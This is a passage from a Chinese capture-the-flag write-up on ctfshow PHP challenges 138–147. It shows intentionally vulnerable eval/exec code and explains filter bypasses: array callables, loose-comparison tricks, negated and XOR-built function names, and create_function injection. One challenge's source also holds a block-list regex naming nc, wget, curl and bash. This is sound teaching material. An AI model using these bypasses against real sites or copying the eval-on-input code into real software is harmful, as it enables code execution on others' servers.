class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strripos(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>], <span class="string">&quot;:&quot;</span>)&gt;-<span class="number">1</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;private function&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">call_user_func(<span class="variable">$_POST</span>[<span class="string">&#x27;ctfshow&#x27;</span>]);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>php特性：</p>
<p>考察了call_user_func()用数组形式调用类方法</p>
<p>详看：根据方法名调用call_user_func()详解</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">call_user_func(array($classname, &#x27;say_hello&#x27;));</span><br><span class="line">调用classname这个类里的say_hello方法</span><br><span class="line"></span><br><span class="line">array[0]=$classname  类名</span><br><span class="line">array[1]=say_hello   say_hello()方法</span><br></pre></td></tr></table></figure>

<p>call_user_func() 除了接受 <code>"类名::方法名"</code> 这种带冒号的字符串，也可以传一个数组：第一个元素是类名（或类的一个对象），第二个元素是方法名，同样可以完成调用。题目只用 strripos() 检查参数里有没有冒号，而 <code>ctfshow[0]=...&amp;ctfshow[1]=...</code> 会被 PHP 解析成数组：PHP 7 下 strripos() 收到数组只会告警并返回 NULL，条件不成立，直接放行（PHP 8 会改为抛 TypeError，这条路就走不通了）。getFlag 是静态方法，整个过程没有反序列化，<code>__wakeup</code> 里的 die 也不会触发。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow[0]=ctfshow&amp;ctfshow[1]=getFlag</span><br></pre></td></tr></table></figure>



<h1 id="web-139"><a href="#web-139" class="headerlink" title="web 139"></a>web 139</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$x</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/\\$|\.|\!|\@|\#|\%|\^|\&amp;|\*|\?|\&#123;|\&#125;|\&gt;|\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i&#x27;</span>, <span class="variable">$x</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;too young too simple sometimes naive!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    check(<span class="variable">$c</span>);</span><br><span class="line">    
exec(<span class="variable">$c</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>





<h1 id="web-140"><a href="#web-140" class="headerlink" title="web 140"></a>web 140</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f2&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f1</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f1&#x27;</span>];</span><br><span class="line">    <span class="variable">$f2</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f2&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9]+$/&#x27;</span>, <span class="variable">$f1</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9]+$/&#x27;</span>, <span 
class="variable">$f2</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> = <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$f1</span>(<span class="subst">$f2</span>());&quot;</span>);</span><br><span class="line">            <span class="keyword">if</span>(intval(<span class="variable">$code</span>) == <span class="string">&#x27;ctfshow&#x27;</span>)&#123;</span><br><span class="line">                <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>查看<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/types.comparisons.php">PHP类型比较表</a> 可发现</p>
<p><code>eval</code>函数的返回值默认是 NULL（不是 false）；只有被执行的代码里有 return 时才返回 return 的值，所以这里 <code>$code</code> 就是 <code>$f1($f2())</code> 的结果</p>
<p><strong><code>0==“字符串”</code> 在 PHP 7 及更早版本返回的是 TRUE</strong>（PHP 8 改了比较规则：整数和非数字字符串比较时会把整数转成字符串再比，<code>0=="ctfshow"</code> 变成 FALSE，这个思路在 PHP 8 上不成立）</p>
<p><code>intval</code>会把不以数字开头的字符串转换为 0，也就是说 <code>intval('a')==0 intval('.')==0 intval('/')==0</code>；但以数字开头的字符串会取前导数字，例如 <code>intval('3a')==3</code>，所以要选返回值不以数字开头的函数组合，否则和 'ctfshow' 比较不会相等</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">md5(phpinfo())            f1=md5&amp;f2=phpinfo</span><br><span class="line">md5(sleep())              f1=md5&amp;f2=sleep</span><br><span class="line">md5(md5())                f1=md5&amp;f2=md5</span><br><span class="line">current(localeconv())     f1=current&amp;f2=localeconv</span><br><span class="line">sha1(getcwd())            因为 md5(&quot;/var/www/html&quot;) 开头是数字、intval 后不为 0，所以改用 sha1</span><br></pre></td></tr></table></figure>



<h1 id="web-141"><a href="#web-141" class="headerlink" title="web 141"></a>web 141</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#error_reporting(0);</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span 
class="line"></span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^\W+$/&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/109143413">绕过无字母数字的方法参考yu师傅的脚本</a>：这里直接利用取反脚本</p>
<p>绕过 return 的方式：<br>php 里数字可以和函数调用做算术运算，例如 <code>1-phpinfo()-1</code> 在求值时会先执行 phpinfo()。运算符不限于减号，加、乘、除都可以；注意若用加号，URL 里的 <code>+</code> 会被解析成空格，要写成 <code>%2B</code>。由于 v3 只能由非单词字符（<code>^\W+$</code>）组成，函数名本身要用 <code>~</code> 取反后的高位字节写出，形如 <code>v3=-~(取反后的phpinfo)()-</code>，v1、v2 各给一个数字即可。</p>
<h1 id="web-142"><a href="#web-142" class="headerlink" title="web 142"></a>web 142</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>))&#123;</span><br><span class="line">        <span class="variable">$d</span> = (<span class="keyword">int</span>)(<span class="variable">$v1</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span> * <span class="number">0x36d</span>);</span><br><span class="line">        sleep(<span class="variable">$d</span>);</span><br><span class="line">        <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">?v1=0       直接给 0，d=0，sleep(0) 不等待</span><br><span class="line">?v1=0x0     16进制写法；注意 PHP 7 起 is_numeric(&quot;0x0&quot;) 为 false，此写法只在 PHP 5 可用</span><br><span class="line">?v1=0e123   科学计数法，数值为 0</span><br></pre></td></tr></table></figure>



<h1 id="web-143"><a href="#web-143" class="headerlink" title="web 143"></a>web 143</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) 
&amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\&#123;|\&#125;|\~|\%|\&amp;|\;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>相比 141 正则改了：<code>~</code>、<code>|</code>、<code>&amp;</code>、<code>+</code>、<code>-</code>、<code>%</code>、<code>$</code>、<code>;</code> 等都被过滤，取反不能用了，但 <code>^</code>、双引号、<code>?</code>、<code>:</code>、<code>(</code>、<code>)</code> 都不在黑名单里，可以用两个不含字母数字的字符串做异或拼出函数名，再用三目运算符或 <code>*</code>、<code>/</code> 把调用接进表达式（末尾分号由 eval 模板补上）</p>
<h1 id="web-144"><a href="#web-144" class="headerlink" title="web 144"></a>web 144</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line"></span><br><span 
class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; check(<span class="variable">$v3</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^\W+$/&#x27;</span>, <span class="variable">$v2</span>))&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> strlen(<span class="variable">$str</span>)===<span class="number">1</span>?<span class="literal">true</span>:<span class="literal">false</span>;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h1 id="web-145"><a href="#web-145" class="headerlink" title="web 145"></a>web 145</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) 
&amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\@|\!|\+|\-|\.|\_|\$|\&#125;|\%|\&amp;|\;|\&lt;|\&gt;|\*|\/|\^|\#|\&quot;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>测试：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;return 1?phpinfo():1;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>这是可以运行出来的</p>
<p>本题黑名单里没有 <code>~</code>，也没有 <code>?</code>、<code>:</code>、<code>(</code>、<code>)</code>，所以直接用取反拼出函数名，再用三目运算符 <code>1?取反函数名():1</code> 执行即可；末尾的分号由 eval 模板自己补上，v3 里不用也不能出现</p>
<h1 id="web-146"><a href="#web-146" class="headerlink" title="web 146"></a>web 146</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$v1</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v1&#x27;</span>];</span><br><span class="line">    <span class="variable">$v2</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v2&#x27;</span>];</span><br><span class="line">    <span class="variable">$v3</span> = (<span class="keyword">String</span>)<span class="variable">$_GET</span>[<span class="string">&#x27;v3&#x27;</span>];</span><br><span 
class="line">    <span class="keyword">if</span>(is_numeric(<span class="variable">$v1</span>) &amp;&amp; is_numeric(<span class="variable">$v2</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-z]|[0-9]|\@|\!|\:|\+|\-|\.|\_|\$|\&#125;|\%|\&amp;|\;|\&lt;|\&gt;|\*|\/|\^|\#|\&quot;/i&#x27;</span>, <span class="variable">$v3</span>))&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;get out hacker!&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="variable">$code</span> =  <span class="keyword">eval</span>(<span class="string">&quot;return <span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span>;&quot;</span>);</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$v1</span><span class="subst">$v3</span><span class="subst">$v2</span> = &quot;</span>.<span class="variable">$code</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>相比 145 又增加了冒号 <code>:</code> 的过滤（分号之前就被过滤了，它由 eval 模板补上），所以三目运算符用不了了；这时可以改用比较运算符和逻辑运算符——<code>=</code> 和 <code>|</code> 都不在黑名单里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;return 1==phpinfo()||1;&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>直接取反绕过即可</p>
<h1 id="web-147"><a href="#web-147" class="headerlink" title="web 147"></a>web 147</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$ctfshow</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;ctf&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>,<span class="variable">$ctfshow</span>)) &#123;</span><br><span class="line">        <span class="variable">$ctfshow</span>(<span class="string">&#x27;&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;show&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><strong>分析正则表达式：</strong><br> <code>/i</code> 不区分大小写<br> <code>/s</code> 是 PCRE_DOTALL，让 <code>.</code> 也能匹配换行（不是字符类 <code>\s</code>，后者才表示空白字符）；这条正则里没有 <code>.</code>，所以 <code>/s</code> 对它没有影响<br> <code>/D</code> 是 PCRE_DOLLAR_ENDONLY：<code>$</code> 只匹配字符串真正的末尾，结尾多一个换行也不算匹配，所以常见的 <code>%0a</code> 结尾绕过在这里用不了</p>
<p><strong>create_function：</strong>（PHP 7.2 起已废弃，PHP 8.0 已移除，这一解法只在 PHP 7.x 及以下环境可用）</p>
<p><a target="_blank" rel="noopener" href="https://paper.seebug.org/755/">参考这篇文章第一道题</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。</span><br><span class="line"></span><br><span class="line">string create_function    ( string $args   , string $code   )</span><br><span class="line"></span><br><span class="line">string $args 参数部分</span><br><span class="line">string $code 方法代码部分</span><br><span class="line"></span><br><span class="line">举例：</span><br><span class="line"></span><br><span class="line">create_function(&#x27;$fname&#x27;,&#x27;echo $fname.&quot;Zhang&quot;;&#x27;)</span><br><span class="line">类似于：</span><br><span class="line"></span><br><span class="line">function fT($fname) &#123;</span><br><span class="line">  echo $fname.&quot;Zhang&quot;;</span><br><span class="line">&#125;</span><br><span class="line">注意：create_function() 内部就是把 $args 和 $code 拼成 function(...)&#123;...&#125; 再 eval，所以 $code 可控等于直接的代码注入</span><br></pre></td></tr></table></figure>

<p>绕过匹配的方式很简单：题目的条件是 <code>!preg_match('/^[a-z0-9_]*$/isD', $ctfshow)</code>，也就是函数名里必须出现一个不在 <code>[a-z0-9_]</code> 里的字符才会走到调用，所以需要在开头或者结尾找到一个这样的字符，同时不影响函数的正常调用</p>
<p>现场制作一个fuzz用的字典：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$myfile</span> = fopen(<span class="string">&quot;ascii.txt&quot;</span>,<span class="string">&quot;w&quot;</span>);</span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$i</span> = <span class="number">0</span>;<span class="variable">$i</span> &lt; <span class="number">129</span>; <span class="variable">$i</span>++)&#123;</span><br><span class="line">	<span class="variable">$a</span> = chr(<span class="variable">$i</span>);</span><br><span class="line">	<span class="keyword">if</span>(!preg_match(<span class="string">&#x27;/[a-z0-9]/isD&#x27;</span>,<span class="variable">$a</span>))&#123;</span><br><span class="line">		preg_replace(<span class="string">&#x27;/[a-z0-9]/isD&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="variable">$a</span>);</span><br><span class="line">		<span class="variable">$b</span> = urlencode(<span class="variable">$a</span>).<span class="string">&quot;\n&quot;</span>;</span><br><span class="line">		<span class="comment">//$c = &quot;未编码：&quot;.$a.&quot;经过编码：&quot;.$b.&quot;\n&quot;;</span></span><br><span class="line">		fwrite(<span 